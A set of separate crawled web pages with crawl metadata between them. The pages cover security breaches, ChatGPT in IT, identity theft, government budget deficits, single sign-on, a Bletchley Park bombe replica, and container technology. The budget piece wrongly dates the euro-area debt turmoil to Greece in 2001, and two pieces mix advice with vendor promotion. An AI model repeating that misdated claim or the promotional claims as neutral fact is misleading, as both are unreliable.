The discovery of this massive fault line in digital security must inspire us to change how we design security systems, and to move quickly towards cryptographic agility. Systems must be able to easily adapt to changes in the cryptographic core. Once they are and we are also aware of what algorithms are used and where, such issues could be fixable with just the push of a button. | <urn:uuid:bd94519c-0aaa-418e-9351-fcb99ec471bf> | CC-MAIN-2024-38 | https://www.infosecglobal.com/news/infineon-vulnerability | 2024-09-08T12:27:08Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651002.87/warc/CC-MAIN-20240908115103-20240908145103-00892.warc.gz | en | 0.954535 | 1,333 | 2.609375 | 3 |
Security breaches are growing sophisticated and rampant, adversely impacting organizations across the globe. It is important for organizations to identify all the underlying incidents that lead to these security breaches. This is to not only understand the reason behind their occurrence, but also to harness valuable insights to tactfully and efficiently counter the growing number of threats.
It has been seen that the leading causes of security breaches include data breaches due to hacking and breaches done by default or weak passwords. Social security breaches also account for a significant fraction of cyberattacks, whereas data breaches that involve credentials stealing malware have also been growing at a rapid rate. Human errors have also contributed to a palpable extent of data breaches in organizations.
Key Reasons Behind Security Breaches
Working with cloud providers renders organizations to understand and follow the shared responsibility model. However, most organizations are unaware of the part of cloud providers in shared responsibility and the part they need to act on themselves. A common reason behind security breaches is the assumption of organizations that default configurations work appropriately.
Compromised passwords have been a major reason for security breaches in recent years, which are stolen through credential harvesting. Access to user credentials is an easy way for accessing systems, which cyberattackers usually exploit as it is an area with least resistance. For example, at the Justus Liebig University (JLU) based in Germany, more than 38,000 students were notified of receiving new passwords because of malware breach.
Human errors are responsible for more than one quarter of the security breaches. Some examples include employees leaving their devices in locations vulnerable to attacks and inadvertently emailing critical information to third parties that are unauthorized. A key instance of basic human error that results in adverse security breaches is misconfiguration of a database or application. This has a great potential of mistakenly exposing sensitive information.
In security the areas that involve are people, technology, and processes. There are errors in radical security processes. For example, improper patch management results in security breaches. Similar to passwords, unpatched systems have been a potential target for cyberattackers, as efforts involved in successful system breaches are very low. Technology is not perfect. There are many areas where failures may occur periodically, which results in a compromised system.
How Organizations Can Safeguard Against Security Breaches
Basic security hygiene processes, managed and implemented correctly will mitigate several breaches caused by hacking. Organizations must look to ensure that security regression testing is an indispensable part of their deployment processes to prevent technology failures which result in security breaches. They must also look to encrypt data on mobile devices to prevent security breaches involving stolen or lost devices.
While several organizations assume passwords are vital for secure and valid authentication, these are actually the achilles heel of authentication practices. For mitigating real threats of security breaches arising from weak or default passwords, organizations must consider reinforcing their authentication practices with adaptive multi-factor authentication solutions that provide robust security with contextual awareness.
Monitor your business’ security in the cloud. Book a free demo now! | <urn:uuid:5eed7b87-5d16-483e-b34a-11c6fbf7acbc> | CC-MAIN-2024-38 | https://cloudlytics.com/2020/09/ | 2024-09-11T01:02:16Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651323.1/warc/CC-MAIN-20240910224659-20240911014659-00692.warc.gz | en | 0.955577 | 600 | 2.921875 | 3 |
ChatGPT and its Impact on the IT Industry
One of our team members had a wild idea long ago that one day there will be a technology to generate software applications given software requirement documents. To our surprise, we were astounded when ChatGPT came alive. We now had the capabilities of ChatGPT in generating code for a prescribed software programming task for example “In java how to split a list into multiple lists of chunk size 10”.
What is ChatGPT?
ChatGPT is a conversational AI chatbot tool designed to understand user intent and provide accurate responses to a wide range of queries. It utilizes large language models (LLMs) trained on massive datasets using unsupervised learning, supervised learning, and reinforcement techniques. These models are used to predict the next word in a sequence of text, enabling ChatGPT to provide insightful and accurate responses to user queries.
What is the impact of chatgpt on IT industry?
ChatGPT has the potential to be a game changer for software professionals, improving their productivity and speeding up the software development process. Programmers can now ask ChatGPT to write code for a given problem, check the code for improvements, ask conceptual questions on any technical topic or technology, and seek best practices to follow for any specific technology or problem.
Furthermore, ChatGPT is much more than a search engine for technical information. It can understand the nuances of information(what, why, how, when) and provide insightful responses to queries that are difficult to obtain from traditional search engines. As such, it is becoming a go-to choice for developers who seek to quickly and efficiently find technical information.
While some may fear that ChatGPT will reduce jobs, it should be viewed as a tool to match the ever-increasing customer demand for producing high-quality software in less time and on a smaller budget. It will help companies and individuals to conceptualize any idea and build it faster.
In terms of software development, ChatGPT is already being integrated into modern applications with built-in AI capabilities. This is likely to challenge and disrupt traditional software applications, with ChatGPT becoming ubiquitous in almost all applications used on a daily basis, including office suites, productivity tools, development IDEs, and analytics applications.
In the near future, we could see built-in ChatGPT tools for development IDEs that will assist software developers in suggesting, fixing, and reviewing code. Imagine the tools maturing to help us walk through code, explain the flow, and query the code base in natural language instead of text search.
The possibilities are endless, and the impact of chatgpt on IT is likely to be significant.
Although ChatGPT is proficient in generating code for specific, simpler problems, it may not be as effective in generating code for more intricate problems. To tackle more complicated problems, we might need to divide them into smaller subproblems and utilize the tool to generate code blocks that we can combine to solve larger issues.
It is worth noting that not all answers and generated code produced by ChatGPT are necessarily accurate. Therefore, it is essential to exercise your own intuition and judgment to validate the answers provided by the tool.
ChatGPT has the potential to revolutionize the IT industry by improving productivity and enabling faster software development. As the technology matures, we can expect to see ChatGPT integrated into more and more software applications, making it an indispensable tool for software professionals. | <urn:uuid:cfef4aee-eb46-4d7a-a37a-39d354ae39de> | CC-MAIN-2024-38 | https://atmecs.com/chatgpt-and-its-impact-on-the-it-industry/ | 2024-09-12T04:42:17Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651422.16/warc/CC-MAIN-20240912043139-20240912073139-00592.warc.gz | en | 0.931909 | 709 | 2.765625 | 3 |
What's Identity Theft?
Identity theft is any crime in which the attacker gets a hold of another person’s data and uses the victim’s identity to commit fraud. For example, a common type of identity theft is when someone uses another person’s credit card to make unauthorized transactions.
That said, while identity thefts most often result in the victim losing money, they can also damage the victim's reputation and even wellbeing. Besides financial identity theft, other types of this criminal activity include medical identity theft, social security identity theft, tax identity theft, and even synthetic identity theft.
The Most Common Forms of Identity Theft
The phrase “identity theft” is a broad term that encompasses all sorts of privacy breaches in which an attacker steals the victim’s personal or financial information. But, there are many different methods that fall under this umbrella. So, it’s crucial to know the most common ones. Here are the most frequent ways attackers can obtain your personal data:
- Data Breaches - This is the most common reason for identity theft problems. The number of data breaches rose dramatically in 2021, and 2022 will likely end up in the same pattern. Personal details like Social Security numbers and credit/debit card information are among the most commonly stolen data in this form of identity theft.
- Compromised Browsing - If you share your personal information on a malicious website, you’re likely directly giving hackers your personal information. So, stick to well-known sites and use a secure browser.
- Malware and Phishing - By injecting your device with malware, hackers can steal your data or spy on your activities without you even realizing it. In line with that, attackers might use phishing emails or text messages to get you to unknowingly give them your valuable personal data.
- Credit Card Theft - A simple and very dangerous form of identity theft. The most common ways credit card theft can occur are through a direct data breach, physical theft, or the attacker using a credit card skimmer.
- Mail Theft - When it comes to this, we’re talking about physical mail theft, a problem that has existed long before the Internet. Any mail you send or receive using the postal system can be intercepted and used by a malicious person to commit identity theft.
Identity Theft Consequences
The consequences of identity theft can be numerous and far-reaching. This is because identity theft doesn’t only affect you at the moment. Most victims of identity theft spend months cleaning up the situation and setting things back in order. This can manifest in several damaging ways:
Consequences on Your Emotional Well-Being
The shock of discovering you’ve become a victim of identity theft is enough to rattle anyone. But, the anger, insecurity, and anxiety that come after it can have even bigger consequences on your emotional well-being. Even more worryingly, some people even get suicidal thoughts and depression from having to go through this.
Consequences on Your Financial Status
Most identity thefts are committed in the interest of gaining some financial benefit from the victim. From the victim’s perspective, this adds to the overall emotional stress, as you’re also experiencing financial consequences.
If the attackers get a hold of your financial information, they can drain your accounts, leaving you penniless. Moreover, the financial ramifications could show through damaged credit, tax problems, and many more issues.
Consequences on Your Physical Health
The stress from losing money or even just having to deal with an identity theft attack can also affect your physical health. Many victims of identity theft attacks report issues like sleeplessness, heart and stomach problems, and other difficulties that come as a result of a weakened immune system.
Consequences on Your Kids
Lastly, even your children aren’t safe from identity theft attacks. Minors are often the target of identity theft, and the consequences can range from having trouble obtaining financial aid to being unable to apply to their desired universities.
Dealing With Identity Theft
The best way to check for any signs of identity theft is to regularly check your credit reports and credit score. Besides this, if you notice any unauthorized transactions, bills for items you didn’t purchase, or get denied credit despite knowing you have a great credit score, any of these can be a telltale sign that you’ve fallen victim to an identity theft attack.
If you determine that you’ve been the target of identity theft, the first thing to do is report it. Luckily, for people in the US, this process is fairly straightforward and uncomplicated. With that in mind, here’s how to report identity theft:
- Contact the company/organization where the fraud occurred
- Place a fraud alert by contacting a credit bureau
- Report the identity theft to the FTC
- File a police report with your local police department
Additionally, once you’ve completed all four steps, it’s time to mitigate and repair the damage the identity theft attack caused you. The first thing to do is close any new accounts the attacker might’ve opened in your name. Then, you should try to get all of your fraudulent charges removed. After that, correct your credit report and keep a close eye on future reports to see if any new frauds pop up.
How Identity Theft Can Be Prevented
By this point, it’s clear why identity theft is bad in so many ways. Moreover, we can also provide you with actionable steps on what to do if you experience identity theft. But, apart from dealing with it, the best way to avoid issues that identity theft causes is to prevent it from happening altogether. In this regard, here are the best ways how to prevent identity theft:
1. Freeze Your Credit
A very practical way to prevent identity fraud is to freeze your credit. Not many people know that they can freeze and unfreeze their credit whenever they want, entirely for free. Freezing your credit won’t impact your credit score or any current accounts. At the same time, it can be great protection against scammers that would try to open an account under your name.
2. Stay On Alert For Malware and Phishing
Malware and phishing attacks are still among the leading causes of identity theft. Most often, these attacks are crude, but sometimes they can be hard to distinguish from legitimate communication.
For instance, scammers might spoof phone calls to appear as they’re calling on behalf of a government agency or trusted organization. In such cases, it’s best to be extra cautious and never click on attachments right away. Instead, try to initiate communication through a trusted source like a phone contact you’ve used before or the official website you’re familiar with.
3. Protect Your Social Security Number
For US citizens, the Social Security number is the pass key to all valuable information. You should always shred any documents that contain it and never carry your card with you. Always be careful when giving it to strangers and offer alternative IDs wherever you can.
4. Use Strong Passwords and Have Additional Authentication
Ultimately, one of the best ways to prevent identity theft is to use strong and unique passwords for every account. Don’t use any obvious passwords that people could guess by getting to know you or by inspecting your social media profiles. Moreover, consider adding an authenticator app into the mix, as it can provide you with an additional layer of protection. This leads us to the final part of this article.
What is the Best Tool for Preventing Online Identity Theft?
Hideez Key 4 is the best all-in-one device you can get to obtain ultimate digital security. This is because it serves several crucial purposes. Available in standalone and enterprise editions, the Hideez Key 4 can:
- Act as a password manager with autofill and an OTP generator, delivering uncompromising passwordless security and proximity login/logout capabilities.
- Protect against cyberattacks like phishing, spoofing, keylogging, and MITM attacks.
- Provide compliance with the latest security standards, ensuring identity theft prevention
If you want to protect your valuable information from identity theft, order your Hideez Key 4 without delay! If you’re a personal user, you can get a 10% discount using the promo code TRYHIDEEZ. For businesses, we’ve also prepared a free pilot and personalized demo of the Hideez Authentication Service, which you can get by clicking the buttons below. | <urn:uuid:9cd7c2f3-afa5-497b-bada-e648d3250131> | CC-MAIN-2024-38 | https://hideez.com/en-ca/blogs/news/identity-theft | 2024-09-14T18:44:24Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651580.73/warc/CC-MAIN-20240914161327-20240914191327-00392.warc.gz | en | 0.924913 | 1,767 | 3.03125 | 3 |
Governments, just like households or companies, need to plan annual budgets, based on their revenue and expense projections.
A Government budget will lead to a deficit or a surplus, which is the difference between government receipts and government spending in a single year.
Just like households, if a government spends more money than it brings in, it has a deficit (indicated by a negative number). If it spends less than it brings in, it’s a budget surplus (indicated by a positive figure).
Unlike households, there is no universal best practice pertaining to government budget management; worse, best practice recommendations vary.
A deficit occurs when the expenses of a government exceed the revenues collected by the government; on the contrary a surplus is when revenues exceed spending.
It is usually presented as a percent of gross domestic product (GDP).
Government deficits or surpluses are measured using the net borrowing (or net lending) figures of the general government sector in the national accounts. Put another way, it is the difference between total revenue and total expenditure, including capital expenditure (in particular, gross fixed capital formation).
Revenue is mainly in the form of taxes, social contributions, dividends and other property income.
Expenditures are chiefly compensation of government employees, social benefits, interest on the public debt, subsidies and gross fixed capital formation.
A government that has a recurring yearly deficit increases its debt.
Governments have 3 ways to raise debt: they can print money (banknotes etc…), sell off assets, or borrow.
Throughout history there have always been different opinions and fierce debates on what is the best practice in budget deficit. The schools of the ”pros” and “cons” of budget deficit best practice have alternatively prevailed.
Many economists, the most influential of them being John Maynard Keynes, believe that governments should run deficits during recessions and periods of high unemployment to compensate for low private demand, while governments should work to balance the budget only during times of full employment and strong growth. The underlying assumption is that more government debt during a recession can stimulate the economy, whereas during times of prosperity, deficits can lead to high inflation rates. They state that the 2008-2010 stimulus packages around the world have softened the threat of a potential new “Great Depression” into a “Great Recession.”
In contrast some Economists argue that the most important issue is to reduce the deficit by cutting government spending and/or increasing taxes. While at the start of the subprime crisis in the late 2000’s world leaders massively embraced the Keynesian economic theories – with huge stimulus packages in many countries-, the political decision makers have then focused on the growing debt levels and called for sharp cuts in public expenditures, as market turmoil was sparked by government deficits of countries in the euro area, particularly Greece in 2001. | <urn:uuid:a1af69e1-49ac-446e-9de0-d926b1d306a5> | CC-MAIN-2024-38 | http://www.best-practice.com/compliance-best-practices/government-compliance-compliance-best-practices/best-practice-in-government-budget-management-30102011/ | 2024-09-19T13:54:36Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700652031.71/warc/CC-MAIN-20240919125821-20240919155821-00892.warc.gz | en | 0.950557 | 582 | 4.21875 | 4 |
Nowadays, single sign-on (SSO) authentication is required more than ever. Many websites offer users the option to sign up with Google, Apple, or any other service. Chances are you have logged in to something via single sign-on today or at least this week. But do you know what it is, how it works, and why it's used? Take a deep dive into the world of single sign-on and all things related to it.
What is SSO?
Single sign-on is a session and user authentication service that allows the user to use a single set of login credentials – namely, a username and password – to access multiple websites or applications. Put plainly, SSO allows users to sign up and access a variety of online accounts with a single username and password, thus making things a lot easier for the everyday user. SSO's primary use is as an identification system that permits websites and apps to use the data of other trusted sites to verify a user upon login or sign-up.
Essentially, SSO puts an end to the days of remembering and entering multiple passwords. An added bonus is that SSO gets users out of the vicious password reset loops.
Additionally, SSO can be great for business, as it improves productivity, security control, and management. With a single security token (a username and password), IT professionals can enable or disable a user’s access to multiple systems, which in some cases mitigates cybersecurity risks.
So, how does the magical service work?
How does SSO work?
Single sign-on is a component of a centralized electronic identity known as federated identity management (FIM). FIM, or Identity Federation, is a system that enables users to use the same verification method to access multiple applications and other resources on the web. FIM is responsible for a few essential processes:
User attributes exchange
When we talk about SSO, it is important to understand that it is primarily related to the authentication part of the FIM system. It's concerned with establishing the user's identity and then sharing that information with each platform that requires that data.
Fancy jargon aside, here are the basic operational processes of single sign-on:
You enter a website.
You click “Sign In with Apple” or any other service.
The site opens Apple's account login page.
If you're already logged in, then it gives the site your data.
You are logged in to your Apple account.
Apple's site verifies that you are authorized to access the site.
If you're authorized, the site creates a session for you and logs you in.
In technical terms, when the user first signs in via an SSO service, the service creates an authentication cookie that remembers that the user is verified. An authentication cookie is a piece of code stored in the user's browser or the SSO service's servers. Next time the user logs in to that same app or website using SSO, the service then transfers the user's authentication cookie to that platform, and the user is allowed to access it. It's important to highlight that an SSO service doesn't identify the exact user since it does not store user identities.
What is an SSO Token?
An SSO token is a digital unit that contains data about a particular user such as their email address. The token is used to transfer user information from one system to another during the single sign-on process. For the recipient to verify that the token comes from a trusted source, it has to be signed digitally.
The SSO service creates a token whenever a user signs in to it. The token works like a temporary ID card which helps identify an already verified user. This means that when the user tries to access a given app, the SSO service will need to pass the user’s authentication token to that app so they can be allowed in.
Because many of the SSO solutions currently available on the market are cloud-based, most of them are offered in a monthly subscription model. The price of a cloud-driven SSO solution designed for small and mid-sized businesses can range from $1 to $10 per user per month.
However, those that want to get an SSO solution designed for a big enterprise will need to either pay more each month or make an entry fee. Enterprise-grade solutions are usually more wide-ranging and require vendors to customize them to each of their client’s needs and requirements. Hence, the price difference.
Is single sign-on secure?
Yes. An SSO protocol is secure when implemented and managed properly and used alongside other cybersecurity tools.
The main benefit introduced by single-sign on with regard to cybersecurity is that, because it allows using a single set of credentials for multiple services, there are fewer login details to be lost or stolen. As long as the server is secure and an organization's access control policies are established, a malicious user or an attacker will have little to no chance to do any damage.
However, this benefit could also pose a certain kind of risk. Since SSO provides instant access to multiple accounts via a single endpoint, if a hacker gains access to an authenticated SSO account, they will also gain access to all the linked applications, websites, platforms, and other online environments.
This issue can be easily mitigated by implementing an additional layer of security known as Multi-Factor Authentication. Combining SSO with MFA allows service providers to verify users' identity while giving them easy access to applications or online platforms.
The benefits of SSO
Reduced password fatigue
With SSO in place, users only have to remember one password, making life a lot easier. Password fatigue is real and dangerous. SSO encourages users to come up with a single strong password rather than using a simple one for each account separately. It also helps users escape the vicious cycle of password reset loops.
Increased employee and IT productivity
When deployed in a business setting, SSO can be a real time saver. According to a recent report, people waste 16.3 billion hours a year trying to remember, type, or reset passwords. In a business environment, every minute counts. Thanks to SSO, users don't need to hop between multiple login URLs or reset passwords and can focus on the tasks at hand.
Enhanced user experience
One of the most valuable benefits of SSO is an improved user experience. Because repeated logins are not required, users can enjoy a digital experience with less hassle. This means that users will be less hesitant to use the service. For any commercial web-based service, SSO is an essential part of their user experience.
Centralized control of user access
SSO offers organizations centralized control over who has access to their systems. In a business setting, you can use SSO to grant new employees specific levels of access to different systems. You can also provide employees with a single set of credentials (username and passwords) to access all company systems.
Top single sign-on solutions
Microsoft Azure AD
Microsoft Azure AD includes Active Directory Federation Services (AD FS) as an option to support SSO. Azure AD also offers reporting, security analytics, and multi-factor authentication services. It's perfectly suited for any company that uses the Microsoft Azure cloud platform, no matter its size.
Okta Identity Cloud
Okta is well-established in the world of SSO solutions. They are open-source SSO leaders because of their flexibility and ease of use. Okta offers customizable open identity management in real time according to business needs, as well as two-factor authentication and a password reset functionality. Okta can serve the needs of multiple industries, from education and nonprofits to financial services and the government.
OneLogin Unified Access Management Platform
OneLogin is an open-source SSO provider that is often used for employee access to the company's cloud-based applications. OneLogin is suited for a variety of IT administrator needs since it is designed to enforce IT policy in real time. It can also be updated according to specific needs if any changes occur, such as an employee leaving.
Idaptive Application Services
Idaptive is primarily suited for small to medium-sized businesses. Idaptive is capable of providing support to many users at once, thanks to their new cloud architecture. The company also offers adaptive MFA, enterprise mobility management (EMM), and user behavior analytics (UBA) all in a single solution.
Ping Intelligent Identity Platform
Ping offers services to large enterprises. The solution can serve anywhere between a few hundred to a few million users. Ping provides both on-premises and cloud options for deploying their solution. Additionally, the service comes with multi-factor authentication.
Does NordPass provide SSO?
Yes, NordPass does provide a single sign-on authentication! It can be set up via NordPass Admin Panel for users who want to log in to the NordPass app with their Microsoft Azure, Google Workspace, or Okta credentials.
This means that if you turn on Microsoft Azure Active Directory (AD), Google Single Sign-On, or Okta Single Sign-On, and invite new members who use one of these SSOs, they will be allowed to login in using their Azure AD, Google, or Okta SSO credentials — it’s as simple as that. | <urn:uuid:ad55568b-a459-4c70-b020-5f8338a24fa7> | CC-MAIN-2024-38 | https://nordpass.com/blog/single-sign-on/ | 2024-09-08T18:41:25Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651017.43/warc/CC-MAIN-20240908181815-20240908211815-00092.warc.gz | en | 0.939839 | 1,922 | 3.234375 | 3 |
British Museum Unveils WWII Computer Replica
The brainchild of Alan Turing--often called the father of modern computer science--and Gordon Welchman, "bombes" such as the one the replica represents were used to decrypt more than 3,000 messages a day from the Nazi's Enigma machine.
A replica of an early computer built to sift through encrypted German messages during World War II has been completed, a British museum announced Friday.
Bletchley Park, where British code-breakers took on the Germans' Enigma machine, unveiled the replica Turing Bombe, and said the electromagnetic computer would enter its commissioning phase later this month.
The brainchild of Alan Turing -- often called the father of modern computer science -- and Gordon Welchman, "bombes" such as the one the replica represents were used to decrypt more than 3,000 Enigma messages daily. They were instrumental throughout World War II in giving the Allies a major intelligence advantage over the Nazis. Breaking German naval messages, for instance, let American and British planners steer Atlantic convoys away from U-boat positions.
The replica sports 108 electromagnetic spinning drums used to test letter combinations that then let analysts match the daily Enigma rotor settings. More than 60 volunteers using original blueprints labored for over 10 years to recreate the computer.
The machine will go on public display September 23 at the National Codes Centre at Bletchley Park, which is near Milton Keynes, about 45 miles northwest of London.
In March, a group of computer enthusiasts combined the power of their desktop PCs to crack several 63-year-old Enigma messages that had been intercepted but never decrypted.
About the Author
You May Also Like
Maximizing cloud potential: Building and operating an effective Cloud Center of Excellence (CCoE)
September 10, 2024Radical Automation of ITSM
September 19, 2024Unleash the power of the browser to secure any device in minutes
September 24, 2024 | <urn:uuid:e47919c3-4477-4d89-adf1-6f38988b5b86> | CC-MAIN-2024-38 | https://www.informationweek.com/it-leadership/british-museum-unveils-wwii-computer-replica | 2024-09-08T20:36:29Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651017.43/warc/CC-MAIN-20240908181815-20240908211815-00092.warc.gz | en | 0.948697 | 405 | 2.953125 | 3 |
What Is Container Technology?
Containers provide a lightweight package that lets you deploy applications anywhere, making them more portable. Container images package services and applications together with their configurations and dependencies. This makes development and testing easier, because applications can be automatically deployed to a realistic staging environment. It also eases scalability in production environments.
Another important element of containers is that they are immutable, meaning that at least in principle, they should not be changed after being deployed. To modify a container, you tear it down and deploy a new one.
The unique properties of containers makes them much more reliable than traditional infrastructure: deployments become repeatable, and you can easily roll back by deploying an older version of a container image. Immutability also makes it possible to deploy the same container image in development, testing, and production environments, supporting agile development principles.
This is part of our series of articles about Docker containers.
In this article:
What Are the Benefits of Containers?
Containers provide a highly effective way to deploy applications and services at scale on any hardware. Applications or services running as containers use a small fraction of the resources on the host (enabling a large number of containers to run on one host). They are well isolated, so they don’t interfere with each other or directly affect the host’s operations.
Here are the main benefits of containers compared to other ways of running software on host infrastructure:
- Lightweight—because containers share the system’s operating system kernel, there is no need to run a complete operating system instance for each application, reducing the size of container files and resources needed. Containers can start quickly, are torn down easily, and are easy to scale horizontally, meaning they can better support cloud-native applications.
- Portability and platform independence—containers have all their dependencies inside. This means that the same software can be created once and run consistently on laptops, on-premise hardware, or in the cloud, with no reconfiguration required.
- Support for modern architectures—containers can be constructed from a simple configuration file and have a high level of portability and consistency. This makes them highly suitable for DevOps, microservices architectures, and serverless computing, in which software is built from small components that are iteratively developed.
- Increased utilization—containers allow developers and operators to increase CPU and memory utilization on physical machines. Containers allow granular deployment and scaling of application components, which can support microservices design patterns.
How Containers Work
In a containerized environment, the host operating system controls each container’s access to computing resources (i.e., storage, memory, CPU) to ensure that no container consumes all the host’s resources.
A container image file is a static, complete, executable version of a service or application. Different technologies use different image types. A Docker image comprises several layers starting with the base image that contains the necessary dependencies to execute the container’s code. It has static layers topped with a readable and writable layer. Every container has a specific, customized container layer, so the underlying image layers are reusable—developers can save and apply them to other containers.
A container engine executes the container images. Most organizations use container orchestration or scheduling solutions like Kubernetes to manage their container deployments. Containers are highly portable because every image contains the dependencies required to execute the code stored in the appropriate container.
The main advantage of containerization is that users can execute a container image on a cloud instance for testing and then deploy it on an on-premises production server. The application performs correctly in both environments without requiring changes to the code within a container.
What Is a Container Image?
A container image is a static immutable file with instructions that specify how a container should run and what should run inside it. An image contains executable code that enables containers to run as isolated processes on IT infrastructure. It consists of platform settings, such as system libraries and tools, that enable software programs to run on a containerization platform like Docker.
Container images are compiled from file system layers built onto a base or parent image. The term base image usually refers to a new image with basic infrastructure components, to which developers can add their own custom components. Compiling a container image using layers enables you to reuse components rather than creating each image from scratch.
What Is Docker?
Docker is an open source platform for creating, deploying, and managing virtualized application containers. It provides an ecosystem of tools that provide various capabilities to package, provision, and run containers.
Docker utilizes a client-server architecture. Here is how it works:
- The daemon deploys containers—a Docker client talks to a daemon that builds, runs and distributes Docker containers.
- Clients and daemons can share resources—a Docker daemon and client can run on the same system. Alternatively, you can connect the client to a remote daemon.
- Clients and daemons communicate via APIs—A Docker daemon and client can communicate via a REST API over a network interface or UNIX sockets.
Related content: Read our guides to:
What Are Windows Containers?
In the past, Docker Toolbox, a variant of Docker for Windows, used to run a VirtualBox instance with a Linux operating system on top of it. It allowed Windows developers to test containers before deploying them on production Linux servers.
Recently, Microsoft adopted container technology, enabling containers to run natively on Windows 10 and Windows Server. Microsoft and Docker worked together to build a native Docker for Windows variant. Kubernetes and Docker Swarm shortly followed.
It is now possible to create and run native Windows and Linux containers on Windows 10 devices. You can also deploy and orchestrate these on Windows servers or Linux servers if you use Linux containers.
What Is Windows Subsystem for Linux?
The Windows Subsystem for Linux (WSL) lets you run a Linux file system, Linux command-line tools, and GUI applications directly on Windows. WSL is a feature of the Windows operating system that enables you to use Linux with the traditional Windows desktop and applications.
Here are common WSL use cases:
- Use Bash, Linux-first frameworks like Ruby and Python, and common Linux tools like sed and awk alongside Windows productivity tools.
- Run Linux in a Bash shell with various distributions, such as Ubuntu, OpenSUSE, Debian, Kali, and Alpine. It enables you to use Bash while running command-line Linux tools and applications.
- Use Windows applications and Linux command-line tools on the same set of files.
WSL requires less CPU, memory, and storage resources than a VM. Developers use WSL to deploy to Linux server environments or work on open source web development projects.
What are Container Runtimes?
Containers are lightweight virtual, isolated entities that include dependencies. They require a container runtime (which typically comes with the container engine) that can unpack the container image file and translate it into a process that can run on a computer.
You can find various types of available container runtimes. Ideally, you should choose the runtime compatible with the container engine of your choice. Here are key container runtimes to consider:
- containerd—this container runtime manages the container lifecycle on a host, which can be a physical or virtual machine (VM). containerd is a daemon process that can create, start, stop, and destroy containers. It can also pull container images from registries, enable networking for a container, and mount storage.
- LXC—this Linux container runtime consists of templates, tools, and language and library bindings. LXC is low-level, highly flexible, and covers all containment features supported by the upstream kernel.
- CRI-O—this is an implementation of the Kubernetes Container Runtime Interface (CRI) that enables you to use Open Container Initiative (OCI)-compatible runtimes. CRI-O offers a lightweight alternative to employing Docker as a runtime for Kubernetes. It lets Kubernetes use any OCI-compliant runtime as a container runtime for running pods. CRI-O supports Kata and runc containers as container runtimes, but you can plug any OCI-conformant runtime.
- Kata—a Kata container can improve the isolation and security of container workloads. It offers the benefits of using a hypervisor, including enhanced security, alongside container orchestration functionality provided by Kubernetes. Unlike the runC runtime, the Kata container runtime uses a hypervisor for isolation when spawning containers, creating lightweight VMs and putting containers inside.
The Open Container Initiative (OCI) is a standard that helps develop container runtimes that will support Kubernetes and other container orchestrators. It includes configurations, several file-system layers, and a manifest that specifies how a runtime should funtion. OCI also includes a standard specification for container images.
Learn more in our detailed guide to container runtimes
Containers vs. Virtual Machines
A virtual machine (VM) is an environment created on a physical hardware system that acts as a virtual computer system with its own CPU, memory, network interfaces, and storage. It is a “guest operating system” running within the “host operating system” installed directly on the host machine.
Containerization and virtualization are similar in that applications can run in multiple environments. The main differences are size, portability, and the level of isolation:
- VMs—Each VM has its own operating system, which can perform multiple resource-intensive functions at once. Because more resources are available on the VM, it can abstract, partition, clone, and emulate servers, operating systems, desktops, databases, and networks. A VM has strong isolation because it runs its own operating system.
- Containers—runs specific package applications, their dependencies and the minimal execution environment they require. A container typically runs one or more applications, and does not attempt to emulate or replicate an entire server. A container has inherently weaker isolation because it shares the operating system kernel with other containers and processes.
Learn more in our guide to Docker vs. virtual machines
Containers and Kubernetes
Kubernetes is a container orchestration platform provided as open source software. It enables you to unify a cluster of machines as a single pool of computing resources. You can employ Kubernetes to organize applications into groups of containers. Kubernetes uses the Docker engine to run the containers, ensuring your application runs as intended.
Here are key features of Kubernetes:
- Compute scheduling—Kubernetes automatically considers the resource needs of containers to find a suitable place to run them.
- Self-healing—when a container crashes, Kubernetes creates a new one to replace it.
- Horizontal scaling—Kubernetes can observe CPU or custom metrics and add or remove instances according to actual needs.
- Volume management—Kubernetes can manage your application’s persistent storage.
- Service discovery and load balancing—Kubernetes can load balance IP addresses, multiple instances, and DNS.
- Automated rollouts and rollbacks—Kubernetes monitors the health of new instances during updates. The platform can automatically roll back to a previous version if a failure occurs.
- Secret and configuration management—Kubernetes can manage secrets and application configuration.
Containers serve as the foundation of modern, cloud native applications. Docker offers the tools needed to create container images easily, and Kubernetes provides a platform that runs everything.
Best Practices for Building Container Images
Use the following best practices when writing Dockerfiles to build images:
- Ephemeral—you should build containers as ephemeral entities that you can stop or delete at any moment. It enables you to replace a container with a new one from the Dockerfile with minimal configuration and setup.
- dockerignore—a .dockerignore file can help you reduce image size and build time. You achieve this by excluding any unnecessary files from the build context. By default the Docker image includes the recursive contents of a directory in which the Dockerfile resides, and .dockerignore lets you specify files that should not be included.
- Size—you should reduce image file sizes to minimize the attack surface. Use small base images such as Alpine Linux or distroless Linux images. However, you do need to keep Dockerfiles readable. You can apply a multi-stage build (available only for Docker 17.05 or higher) or a builder pattern.
- Multi-stage build—this build lets you use multiple FROM statements within a single Dockerfile. It enables you to selectively copy artifacts from one stage to another, leaving behind anything unneeded in the final image. You can use it to reduce image file sizes without maintaining separate Dockerfiles and custom scripts for a builder pattern.
- Packages—never install unnecessary packages when you build images.
- Commands—do not use multiple RUN commands. When possible, use multi-line commands for faster builds, for example, when you need to install a list of packages.
- Linters—use a linter to automatically catch errors in your Docker file and clean up your syntax and layout.
Learn more in our detailed guide to container images
Best Practices for Container Security
Container security is a process that includes various steps. It covers container building, content and configuration assessment, runtime assessment, and risk analysis. Here are key security best practices for containers:
- Prefer slim containers—you can minimize the application’s attack surface by removing unnecessary components.
- Use only trusted base images—the CI/CD process should only include usable images that were previously scanned and tested for reliability.
- Harden the host operating system—you should use a script to configure the host properly according to CIS benchmarks. You can use a lightweight Linux distribution for hosting containers like CoreOS or Red Hat Enterprise Linux Atomic Host.
- Remove permission—you should never run a privileged container because it allows malicious users to take over the host system. It threatens your entire infrastructure.
- Manage secrets—a secret can include database credentials, SSL keys, encryption keys, or API keys. You must manage secrets to ensure it is impossible to discover them.
